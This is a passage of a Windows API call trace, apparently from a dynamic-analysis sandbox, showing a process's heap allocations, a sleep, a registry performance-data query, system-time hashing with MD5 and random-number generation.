RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.123] GetProcessHeap () returned 0xe30000 [0124.123] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0124.124] GetProcessHeap () returned 0xe30000 [0124.124] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825578 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825578 | out: hHeap=0xe30000) returned 1 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826028 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826028 | out: hHeap=0xe30000) returned 1 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68260b8 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68260b8 | out: hHeap=0xe30000) returned 1 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0124.125] GetProcessHeap () returned 0xe30000 [0124.125] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0124.125] GetProcessHeap () returned 0xe30000 [0124.126] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0124.126] GetProcessHeap () returned 0xe30000 [0124.126] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0124.126] GetProcessHeap () returned 0xe30000 [0124.126] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.126] GetProcessHeap () returned 0xe30000 [0124.126] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.126] GetProcessHeap () returned 0xe30000 [0124.126] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0124.126] GetProcessHeap () returned 0xe30000 [0124.126] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0124.126] GetProcessHeap () returned 0xe30000 [0124.126] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0124.126] GetProcessHeap () returned 0xe30000 [0124.126] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0124.126] GetProcessHeap () returned 0xe30000 [0124.126] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826388 [0124.126] GetProcessHeap () returned 0xe30000 [0124.126] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826388 | out: hHeap=0xe30000) returned 1 [0124.126] GetProcessHeap () returned 0xe30000 [0124.126] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0124.126] GetProcessHeap () returned 0xe30000 [0124.126] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0124.126] GetProcessHeap () returned 0xe30000 [0124.126] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0124.126] GetProcessHeap () returned 0xe30000 [0124.126] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0124.127] GetProcessHeap () returned 0xe30000 [0124.127] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf0daf8 | out: hHeap=0xe30000) returned 1 [0124.127] GetProcessHeap () returned 0xe30000 [0124.127] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825728 | out: hHeap=0xe30000) returned 1 [0124.127] GetProcessHeap () returned 0xe30000 [0124.127] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2c0d8 | out: hHeap=0xe30000) returned 1 [0124.127] GetProcessHeap () returned 0xe30000 [0124.127] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4530 | out: hHeap=0xe30000) returned 1 [0124.127] Sleep (dwMilliseconds=0xea60) [0134.503] GetTickCount () returned 0x11874b1 [0134.503] GetProcessHeap () returned 0xe30000 [0134.503] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2080) returned 0xecab68 [0134.503] RegQueryValueExA (in: hKey=0x80000004, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0xecab68, lpcbData=0x795e97c*=0x2000 | out: lpType=0x0, lpData=0xecab68*=0x50, lpcbData=0x795e97c*=0x3d8) returned 0x0 [0134.508] GetProcessHeap () returned 0xe30000 [0134.508] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0134.508] GetTickCount () returned 0x11874b1 [0134.508] GetSystemTimes (in: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4 | out: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4) returned 1 [0134.508] GetCurrentProcess () returned 0xffffffff [0134.508] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4 | out: lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4) returned 1 [0134.508] CryptAcquireContextA (in: phProv=0x795e978, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x795e978*=0xed4f70) returned 1 [0134.509] CryptCreateHash (in: hProv=0xed4f70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x795e97c | out: phHash=0x795e97c) returned 1 [0134.509] CryptHashData (hHash=0xec21f0, pbData=0x859c10, dwDataLen=0x1cc, dwFlags=0x0) returned 1 [0134.509] CryptGetHashParam (in: hHash=0xec21f0, dwParam=0x4, pbData=0x795e974, pdwDataLen=0x795e970, dwFlags=0x0 | out: pbData=0x795e974, pdwDataLen=0x795e970) returned 1 [0134.509] CryptGetHashParam (in: hHash=0xec21f0, dwParam=0x2, pbData=0x795e998, pdwDataLen=0x795e974, dwFlags=0x0 | out: pbData=0x795e998, pdwDataLen=0x795e974) returned 1 [0134.510] CryptDestroyHash (hHash=0xec21f0) returned 1 [0134.510] CryptReleaseContext (hProv=0xed4f70, dwFlags=0x0) returned 1 [0134.510] GetProcessHeap () returned 0xe30000 [0134.510] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x184) returned 0xed4530 [0134.510] wnsprintfA (in: pszDest=0xed4530, cchDest=4, pszFmt="%02x" | out: pszDest="3d") returned 2 [0134.510] wnsprintfA (in: pszDest=0xed4532, cchDest=4, pszFmt="%02x" | out: pszDest="38") returned 2 [0134.510] wnsprintfA (in: pszDest=0xed4534, cchDest=4, pszFmt="%02x" | out: pszDest="3c") returned 2 [0134.510] wnsprintfA (in: pszDest=0xed4536, cchDest=4, pszFmt="%02x" | out: pszDest="13") returned 2 [0134.510] wnsprintfA (in: pszDest=0xed4538, cchDest=4, pszFmt="%02x" | out: pszDest="b6") returned 2 [0134.510] wnsprintfA (in: pszDest=0xed453a, cchDest=4, pszFmt="%02x" | out: pszDest="5b") returned 2 [0134.510] wnsprintfA (in: pszDest=0xed453c, cchDest=4, pszFmt="%02x" | out: pszDest="b5") returned 2 [0134.510] wnsprintfA (in: pszDest=0xed453e, cchDest=4, pszFmt="%02x" | out: pszDest="de") returned 2 [0134.510] wnsprintfA (in: pszDest=0xed4540, cchDest=4, pszFmt="%02x" | out: pszDest="03") returned 2 [0134.510] wnsprintfA (in: pszDest=0xed4542, cchDest=4, pszFmt="%02x" | out: pszDest="68") returned 2 [0134.510] wnsprintfA (in: pszDest=0xed4544, cchDest=4, pszFmt="%02x" | out: pszDest="ea") returned 2 [0134.510] wnsprintfA (in: pszDest=0xed4546, cchDest=4, pszFmt="%02x" | out: pszDest="cc") returned 2 [0134.510] wnsprintfA (in: pszDest=0xed4548, cchDest=4, pszFmt="%02x" | out: pszDest="ed") returned 2 [0134.510] wnsprintfA (in: pszDest=0xed454a, cchDest=4, pszFmt="%02x" | out: pszDest="e0") returned 2 [0134.510] wnsprintfA (in: pszDest=0xed454c, cchDest=4, pszFmt="%02x" | out: pszDest="cb") returned 2 [0134.510] wnsprintfA (in: pszDest=0xed454e, cchDest=4, pszFmt="%02x" | out: pszDest="3d") returned 2 [0134.510] CryptAcquireContextW (in: phProv=0x795e6fc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x795e6fc*=0xed4cc8) returned 1 [0134.511] CryptGenRandom (in: hProv=0xed4cc8, dwLen=0x80, pbBuffer=0x795e710 | out: pbBuffer=0x795e710) returned 1 [0134.511] CryptReleaseContext (hProv=0xed4cc8, dwFlags=0x0) returned 1 [0134.511] GetProcessHeap () returned 0xe30000 [0134.511] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2b430 [0134.511] GetProcessHeap () returned 0xe30000 [0134.511] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x6826388 [0134.511] GetProcessHeap () returned 0xe30000 [0134.511] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2bbc8 [0134.511] GetProcessHeap () returned 0xe30000 [0134.511] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x68105d0 [0134.511] GetProcessHeap () returned 0xe30000 [0134.511] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2bbc8 | out: hHeap=0xe30000) returned 1 [0134.511] GetProcessHeap () returned 0xe30000 [0134.511] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x68115c0 [0134.511] GetProcessHeap () returned 0xe30000 [0134.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x488) returned 0xee8818 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0x6826538 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0x681b3c8 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xf0daf8 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xf2b6b8 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48c) returned 0x6874278 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9f098 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0x6811b10 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf2b6b8 | out: hHeap=0xe30000) returned 1 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xef3600 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6811b10 | out: hHeap=0xe30000) returned 1 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9fab0 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x288) returned 0x6811070 [0134.512] GetProcessHeap () returned 0xe30000 [0134.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9fab0 | out: hHeap=0xe30000) returned 1 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xed39f8 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6811070 | out: hHeap=0xe30000) returned 1 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825de8 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825de8 | out: hHeap=0xe30000) returned 1 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68259f8 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68259f8 | out: hHeap=0xe30000) returned 1 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826148 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826148 | out: hHeap=0xe30000) returned 1 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825cc8 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825cc8 | out: hHeap=0xe30000) returned 1 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0134.513] GetProcessHeap () returned 0xe30000 [0134.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0134.513] GetProcessHeap () returned 0xe30000 [0134.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825c38 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825c38 | out: hHeap=0xe30000) returned 1 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825d58 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825d58 | out: hHeap=0xe30000) returned 1 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825848 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825848 | out: hHeap=0xe30000) returned 1 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826418 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826418 | out: hHeap=0xe30000) returned 1 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0134.514] GetProcessHeap () returned 0xe30000 [0134.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.514] GetProcessHeap () returned 0xe30000 [0134.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6826538 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6826538 | out: hHeap=0xe30000) returned 1 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68262f8 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68262f8 | out: hHeap=0xe30000) returned 1 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x68254e8 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68254e8 | out: hHeap=0xe30000) returned 1 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825f08 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825f08 | out: hHeap=0xe30000) returned 1 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825968 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825968 | out: hHeap=0xe30000) returned 1 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0x6825ba8 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6825ba8 | out: hHeap=0xe30000) returned 1 [0134.515] GetProcessHeap () returned 0xe30000 [0134.515] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 